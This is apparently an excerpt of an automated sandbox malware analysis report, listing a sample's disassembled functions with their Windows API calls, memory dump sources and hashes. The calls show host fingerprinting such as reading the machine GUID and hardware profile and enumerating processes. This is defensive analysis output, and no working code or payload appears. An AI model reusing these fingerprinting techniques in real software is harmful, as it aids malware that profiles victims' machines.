                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E418131600219ABCB15EBA2D9529EE7369AF44344F41441EF90267241DF7CBD86CBE9
                                                                                                                                                                                                                                                                                      Function 00411120 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                      • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharCloseOpenQueryValue
                                                                                                                                                                                                                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                      • API String ID: 47404925-1211650757
                                                                                                                                                                                                                                                                                      • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                      • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                                      Function 004076B0 Relevance: 9.1, APIs: 6, Instructions: 74filememoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                      • Instruction ID: 57bb2ce498e656ac9101d6a6683512ef7afea4cd211be1053fa5c26a8075d75e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF21DE75204B009FC320EF64C984A6AB7F5FF89354F00482DF996CB2A0D735B945CBA2
                                                                                                                                                                                                                                                                                      Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 51memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                                      • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                      • Instruction ID: 70da7db2db91f88941c3e71440bfa6ebbd6eb466aaac7195974b89fd4c7015d6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA01D431A0665457E3102B386C09BEFB794AF16705F505538F888A2271EB20898586E9
                                                                                                                                                                                                                                                                                      Function 00410700 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                                                                                                                      • String ID: Unknown
                                                                                                                                                                                                                                                                                      • API String ID: 277847849-1654365787
                                                                                                                                                                                                                                                                                      • Opcode ID: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                      • Instruction ID: 9523786d007b465f85d219b7e39a8a5dfbdd483b20afe91046872d233f87955e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9201A5313003187BD620B6629C56FEF775E9FC5758F04082EB9455B282DEBCA8C587AA
                                                                                                                                                                                                                                                                                      Function 00410CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocGlobalMemoryProcessStatusmemsetwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %d MB
                                                                                                                                                                                                                                                                                      • API String ID: 1522292957-2651807785
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                      • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                                      Function 00402790 Relevance: 7.6, APIs: 5, Instructions: 104stringnetworkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                      • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                                      Function 00410FE0 Relevance: 7.6, APIs: 5, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
